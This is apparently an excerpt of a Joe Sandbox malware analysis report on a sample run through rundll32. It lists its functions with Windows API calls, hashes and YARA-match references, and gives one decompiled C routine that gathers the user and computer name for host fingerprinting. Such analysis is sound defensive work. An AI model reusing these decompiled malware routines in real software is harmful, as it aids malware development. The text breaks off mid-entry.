                                • Instruction ID: 0b7b129fe05491e028b6cca1aaca4af7035d1386e99c9612512ea08c1dcfa9de
                                • Opcode Fuzzy Hash: 0b3483380385043abb76d9528878f88053f2fcd437c85870c0410f7ad26a54b9
                                • Instruction Fuzzy Hash: 46318275A002049FCB01FF75D8489AE7BF9EB8A31472589ABE816EF354E7718811CF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348C20F Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlImageNtHeader.NTDLL(00000000), ref: 0348C228
                                  • Part of subcall function 0347A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03477D5E), ref: 0347A6BE
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,034789E4,00000000), ref: 0348C26A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0348C2BC
                                • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,034789E4,00000000), ref: 0348C2D5
                                  • Part of subcall function 0347E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0347EA0D
                                  • Part of subcall function 0347E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,0348C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 0347EA50
                                • GetLastError.KERNEL32(?,00000000,034789E4,00000000,?,?,?,?,?,?,?,03479100,?), ref: 0348C30D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                • String ID:
                                • API String ID: 1921436656-0
                                • Opcode ID: c6f834a49b0193ac39eecb28a9517e258375ab772c9602fe90316cc0c0e9389f
                                • Instruction ID: 66f77bfb883afdb34eb9b2352cf32d4fe3e393161a5731840b191d7982610af0
                                • Opcode Fuzzy Hash: c6f834a49b0193ac39eecb28a9517e258375ab772c9602fe90316cc0c0e9389f
                                • Instruction Fuzzy Hash: D3315E75A00205AFDF11FFA5C881AAEBBB8EF09750F15009BE905AF354D7309D45CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03479FF6 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0347A078
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347A091
                                • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0347A09E
                                • lstrlen.KERNEL32(0349B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 0347A0B0
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0347A0E1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                • String ID:
                                • API String ID: 2734445380-0
                                • Opcode ID: 28d39861220580f1bc9327eaf34a77284681c1ca6d7d87a97572c493f3ff892a
                                • Instruction ID: d6dc34b290b7f9a2debbbef774964037e1f91032b4a36ef5a37852c0504af41f
                                • Opcode Fuzzy Hash: 28d39861220580f1bc9327eaf34a77284681c1ca6d7d87a97572c493f3ff892a
                                • Instruction Fuzzy Hash: 7131CF32900248FFCB11EF99DC89EEF7BB8EF05310F14845AF904AA200E7749A55CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347DD77 Relevance: 7.6, APIs: 5, Instructions: 91memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,03473DA2,00000000,00000001,?,?,?), ref: 0347DD92
                                • lstrlen.KERNEL32(?), ref: 0347DDA2
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347DDD6
                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0347DE01
                                • memcpy.NTDLL(00000000,?,?), ref: 0347DE20
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347DE81
                                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0347DEA3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Allocatelstrlenmemcpy$Free
                                • String ID:
                                • API String ID: 3204852930-0
                                • Opcode ID: 1b371c43ef423dc1b8d55afc7bf44a7edb6c8acf9a4916076d4d149b9960ba09
                                • Instruction ID: d8b1f740972738728d928bec8fc36fb34f9b8b7347f97ae2713e872bedc08cf2
                                • Opcode Fuzzy Hash: 1b371c43ef423dc1b8d55afc7bf44a7edb6c8acf9a4916076d4d149b9960ba09
                                • Instruction Fuzzy Hash: 7D313C72C1060AAFDF12DF65CC809EFBBB9EF15244F18446AE904AB215E731DA148FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03481ECD Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034870C3: RtlEnterCriticalSection.NTDLL(0349A428), ref: 034870CB
                                  • Part of subcall function 034870C3: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034870E0
                                  • Part of subcall function 034870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 034870F9
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03481F04
                                • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,03488667,?,00000000), ref: 03481F15
                                • lstrcmpi.KERNEL32(00000002,?), ref: 03481F5B
                                • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,03488667,?,00000000), ref: 03481F6F
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,03488667,?,00000000), ref: 03481FB5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                • String ID:
                                • API String ID: 733514052-0
                                • Opcode ID: ab2e91d0846cb17611ddd3db474c5f79cfc13903b6009afa1ad5e90739d84634
                                • Instruction ID: 1d4dfdc4e9ba5183ad8945f2d1f586998efc8ed7ffa10ed28b693664b05d1af3
                                • Opcode Fuzzy Hash: ab2e91d0846cb17611ddd3db474c5f79cfc13903b6009afa1ad5e90739d84634
                                • Instruction Fuzzy Hash: ED31CE76900208AFDB10EFA8D8C8AAE7BF8FF05254F14006BFA05AF201E7349D458B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03488327 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 0348833B
                                • GetComputerNameW.KERNEL32(00000000,?), ref: 03488357
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 03488391
                                • GetComputerNameW.KERNEL32(?,?), ref: 034883B4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 034883D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 7fc67f6083b7277a074727e328678f78cce7bc84384521f13181e5e978d78a0c
                                • Instruction ID: 22ba32c4ecb2d84b998175daf527dc875befd86ff6692b69675d2a398a9d8500
                                • Opcode Fuzzy Hash: 7fc67f6083b7277a074727e328678f78cce7bc84384521f13181e5e978d78a0c
                                • Instruction Fuzzy Hash: 9A21EA76D00208FFDB11EFE9D9848EEBBBCEF48200B6444AAE505EB241E7309B45DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347242A Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0347243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0348D58C
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 03472454
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 03472467
                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 03472478
                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 034724E3
                                • InterlockedIncrement.KERNEL32(0349A43C), ref: 034724FA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                • String ID:
                                • API String ID: 3915436794-0
                                • Opcode ID: da934e0827558b62d2f2caf309ce549c4c6839df5de76d06cc6df1261c6c237c
                                • Instruction ID: def3237cb7f71888f40dc9fd4f847b7f6bc315d5a9e4799ce8e8259bc223bc0b
                                • Opcode Fuzzy Hash: da934e0827558b62d2f2caf309ce549c4c6839df5de76d06cc6df1261c6c237c
                                • Instruction Fuzzy Hash: AE31DD32900305DFC721EF28D84896BBBE8FB89369B15491FF8559B200D770D811CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03432A11 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03432A11() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x75bcc742
						_v12 = _v12 + _t11;
						_t64 = E03436D63(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E03436C2C(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x34357e9
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                0x03432a1f
                                0x03432a22
                                0x03432a25
                                0x03432a2b
                                0x03432a30
                                0x03432a36
                                0x03432a3e
                                0x03432a41
                                0x03432a47
                                0x03432a4c
                                0x03432a55
                                0x03432a59
                                0x03432a66
                                0x03432a6a
                                0x03432a6c
                                0x03432a70
                                0x03432a73
                                0x03432a83
                                0x03432ad6
                                0x03432ad7
                                0x03432a85
                                0x03432a8a
                                0x03432a8b
                                0x03432a90
                                0x03432a93
                                0x03432aa6
                                0x00000000
                                0x03432aa8
                                0x03432aab
                                0x03432ab0
                                0x03432abe
                                0x03432ac1
                                0x03432ac7
                                0x03432acc
                                0x00000000
                                0x03432ace
                                0x03432ace
                                0x03432ad1
                                0x03432ad1
                                0x03432acc
                                0x03432aa6
                                0x03432adc
                                0x03432add
                                0x03432a4c
                                0x03432ae3

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,034357E7), ref: 03432A25
                                • GetComputerNameW.KERNEL32(00000000,034357E7), ref: 03432A41
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetUserNameW.ADVAPI32(00000000,034357E7), ref: 03432A7B
                                • GetComputerNameW.KERNEL32(034357E7,75BCC740), ref: 03432A9E
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,034357E7,00000000,034357E9,00000000,00000000,?,75BCC740,034357E7), ref: 03432AC1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 603c25818222128ad5a40efc73e4c95c7cfce307bafb2b718bcfca6a196ae667
                                • Instruction ID: a58fd4c84802c9a2329c76e8373e687c669ee3cb40a2f495cafcea877ba8f88c
                                • Opcode Fuzzy Hash: 603c25818222128ad5a40efc73e4c95c7cfce307bafb2b718bcfca6a196ae667
                                • Instruction Fuzzy Hash: 1621EC76900208FFDB11EFE9D9849EEBBB8FF49200B5444AAE501EB244E7B09B45DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347306D Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • DeleteFileA.KERNEL32(00000000,000004D2), ref: 03473090
                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03473099
                                • GetLastError.KERNEL32 ref: 034730A3
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03473162
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 3543646443-0
                                • Opcode ID: cdb10ef17604eed60fdeb1c0a77030c37e9749c0e3c6ef589f73e05c0b40e2dc
                                • Instruction ID: 5cd78648677cfa314eb30b784e9ee4f7637099450f817eee1bc6699df09f6786
                                • Opcode Fuzzy Hash: cdb10ef17604eed60fdeb1c0a77030c37e9749c0e3c6ef589f73e05c0b40e2dc
                                • Instruction Fuzzy Hash: 812181B6102210BFC650FBE9EC9AE8A37DC9F5A210B060557B605EF245D624E9058BFD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03482F4E Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03481C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03481C25
                                  • Part of subcall function 03481C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 03481C3B
                                  • Part of subcall function 03481C19: _snwprintf.NTDLL ref: 03481C60
                                  • Part of subcall function 03481C19: CreateFileMappingW.KERNEL32(000000FF,0349A1E8,00000004,00000000,00001000,?), ref: 03481C7C
                                  • Part of subcall function 03481C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03481C8E
                                  • Part of subcall function 03481C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 03481CC6
                                • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03482F89
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03482F92
                                • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03482FD9
                                • GetLastError.KERNEL32(03483959,00000000,00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03483008
                                • CloseHandle.KERNEL32(00000000,03483959,00000000,00000000,?,?,?,?,?,?,?,03479100,?), ref: 03483018
                                  • Part of subcall function 0347C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0347171E,?,?,00000000,?), ref: 0347C2B6
                                  • Part of subcall function 0347C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0347171E,?,?,00000000,?), ref: 0347C2DE
                                  • Part of subcall function 0347C2AA: memset.NTDLL ref: 0347C2F0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                • String ID:
                                • API String ID: 1106445334-0
                                • Opcode ID: 083360fee7760b44ff6940cb635771a5ed41e746119539e73716e03321e99a7e
                                • Instruction ID: e4f4f9c660c1714da52c332a14fdfb8402ff8568e7e53faa7ceb464a8d7167c6
                                • Opcode Fuzzy Hash: 083360fee7760b44ff6940cb635771a5ed41e746119539e73716e03321e99a7e
                                • Instruction Fuzzy Hash: 9221FF39600305AFDB11FF76EC01A5F77ECAF05610B14086BEA41EE214EB71D802DBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348A651 Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0347148A,?,?,?), ref: 0348A66F
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,0347148A,?,?,?), ref: 0348A67F
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0347148A,?,?,?), ref: 0348A6AB
                                • GetLastError.KERNEL32(?,?,0347148A,?,?,?), ref: 0348A6D0
                                • CloseHandle.KERNEL32(000000FF,?,?,0347148A,?,?,?), ref: 0348A6E1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastReadSize
                                • String ID:
                                • API String ID: 3577853679-0
                                • Opcode ID: 976437b09d892f881ef904f9729eb2cc449272ecaf107500c907ea53af43b4d9
                                • Instruction ID: 707ecda0cfb28a7eb47163e83aedbf586e68ba402c3ac9b4e74da7cde8f0ef91
                                • Opcode Fuzzy Hash: 976437b09d892f881ef904f9729eb2cc449272ecaf107500c907ea53af43b4d9
                                • Instruction Fuzzy Hash: FC115032100214BFDB21BF64CC88AAFBB9CEB053A0F150527FC55BF264D6B19C418798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034775D8 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?), ref: 034775E9
                                • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?), ref: 03477602
                                • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 0347762A
                                • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 03477639
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,034887C2,?,?,?), ref: 03477670
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Trim$FreeHeap
                                • String ID:
                                • API String ID: 2132463267-0
                                • Opcode ID: 79ed2f2eaadee3cc9fbea7776d74b63736733160176c3ac5ce37163c497d113e
                                • Instruction ID: fced4aac806790f144a0f6c05bdbbc6ce20da5a2fe76372d203df2a08a5e1372
                                • Opcode Fuzzy Hash: 79ed2f2eaadee3cc9fbea7776d74b63736733160176c3ac5ce37163c497d113e
                                • Instruction Fuzzy Hash: C1118E32200205BBD722EB6DDC85FEB7BECDB556A4F550027BA09EF255EB70D8018794
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348389D Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,02CCD5A8,?,?,00000000,00000000,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C), ref: 034838D4
                                • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 03483904
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 03483913
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03483931
                                • GetLastError.KERNEL32(?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 03483941
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                • String ID:
                                • API String ID: 653387826-0
                                • Opcode ID: 37eaf206417bc426a5882ac1a6972f2b8ad3fbadd62458bfcd40db14603a7c63
                                • Instruction ID: af90cda663181861d305f38e4eaa388bf1b617affb2774fa5b5e73bd12d2227d
                                • Opcode Fuzzy Hash: 37eaf206417bc426a5882ac1a6972f2b8ad3fbadd62458bfcd40db14603a7c63
                                • Instruction Fuzzy Hash: B4213DB9600702EFD711EFA9C984A4ABBF8FF08710710856AEA5ADB700D770E944CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03483775 Relevance: 7.6, APIs: 5, Instructions: 67memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • InterlockedIncrement.KERNEL32(0349A06C), ref: 03483785
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 034837DC
                                • InterlockedDecrement.KERNEL32(0349A06C), ref: 034837F1
                                • DeleteFileA.KERNEL32(00000000), ref: 0348380F
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348381D
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                  • Part of subcall function 0347A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0347A391
                                  • Part of subcall function 0347A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0347A3BD
                                  • Part of subcall function 0347A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0347A3CD
                                  • Part of subcall function 0347A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0347A405
                                  • Part of subcall function 0347A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0347A427
                                  • Part of subcall function 0347A316: GetShellWindow.USER32 ref: 0347A436
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                                • String ID:
                                • API String ID: 1587453479-0
                                • Opcode ID: bb75ae476ce56eac3670e5c84482766c8216efdcd8006bbbe8faa596dde45139
                                • Instruction ID: ce1c787e301bb4aaf3793ab599f49de62e3d997f01546196a8554961f17632a8
                                • Opcode Fuzzy Hash: bb75ae476ce56eac3670e5c84482766c8216efdcd8006bbbe8faa596dde45139
                                • Instruction Fuzzy Hash: C511517D500208BFDB12FFA5CC85EAE7EADEB55690F108067FA05AE201D771C9449BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03487408 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 03487436
                                • GetLastError.KERNEL32 ref: 03487459
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0348746C
                                • GetLastError.KERNEL32 ref: 03487477
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034874BF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                • String ID:
                                • API String ID: 1671499436-0
                                • Opcode ID: 6e169f3a2b753bcf5e39509ad448ed266dd4c0bca4483231455da01ae235ee10
                                • Instruction ID: 9fb51f3b349f80c27aaeed854eeeff476b0cd21aaae15ed645f2816693acb1d0
                                • Opcode Fuzzy Hash: 6e169f3a2b753bcf5e39509ad448ed266dd4c0bca4483231455da01ae235ee10
                                • Instruction Fuzzy Hash: D321DE30100204EBEB22EF91D989F5EBFB9EF42B14F34045AE182AE2A0D7749D84CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034726D3 Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                                Download Yara Rule
                                APIs
